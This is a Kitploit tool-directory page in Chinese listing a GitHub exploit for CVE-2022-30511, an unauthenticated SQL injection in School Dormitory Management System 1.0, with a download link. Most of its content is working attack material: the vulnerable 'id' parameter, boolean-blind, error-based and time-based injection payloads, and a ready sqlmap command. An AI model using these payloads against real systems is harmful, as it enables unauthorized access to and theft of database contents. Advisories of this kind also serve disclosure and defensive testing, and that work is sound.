Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-30511 — 学校宿舍管理系统 1.0 - 未授权SQL注入 | Kitploit
工具/GitHubGitHub/bigzooooz/cve-2022-30511
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试数据库安全
GitHubbigzooooz/cve-2022-30511

CVE-2022-30511

学校宿舍管理系统 1.0 - 未授权SQL注入

查看仓库
1114年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-30511

学校宿舍管理系统 1.0 - 未认证SQL注入

漏洞标题:学校宿舍管理系统 1.0 - 未认证SQL注入

日期:2022-05-25

CVE:CVE-2022-30511

漏洞发现者:Abdulaziz Saad (@b4zb0z)

厂商主页:https://www.sourcecodester.com/

软件链接:https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html

版本:1.0

测试环境:LAMP, Ubuntu


[#] 漏洞位置: $_GET['id'] 位于 /dms/admin/accounts/view_details.php:4

参数:id (GET) 类型:基于布尔的盲注 标题:AND 布尔型盲注 - WHERE 或 HAVING 子句 载荷:page=accounts/view_details&id=2' AND 8853=8853 AND 'kujz'='kujz

root@kitploit:~
类型:基于错误的注入
root@kitploit:~
标题:MySQL >= 5.0 基于错误的注入 - WHERE, HAVING, ORDER BY 或 GROUP BY 子句 (FLOOR)
载荷:page=accounts/view_details&id=2' AND (SELECT 8739 FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT (ELT(8739=8739,1))),0x71766b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'fkLf'='fkLf
root@kitploit:~
类型:基于时间的盲注
root@kitploit:~
标题:MySQL >= 5.0.12 基于时间的盲注 (查询 SLEEP)
载荷:page=accounts/view_details&id=2' AND (SELECT 7339 FROM (SELECT(SLEEP(5)))Dkxx) AND 'UZCm'='UZCm

[#] 利用SQLMAP进行漏洞利用: sqlmap -u "http://localhost/dms/admin/?page=accounts/view_details&id=2" --dbms=mysql

下载工具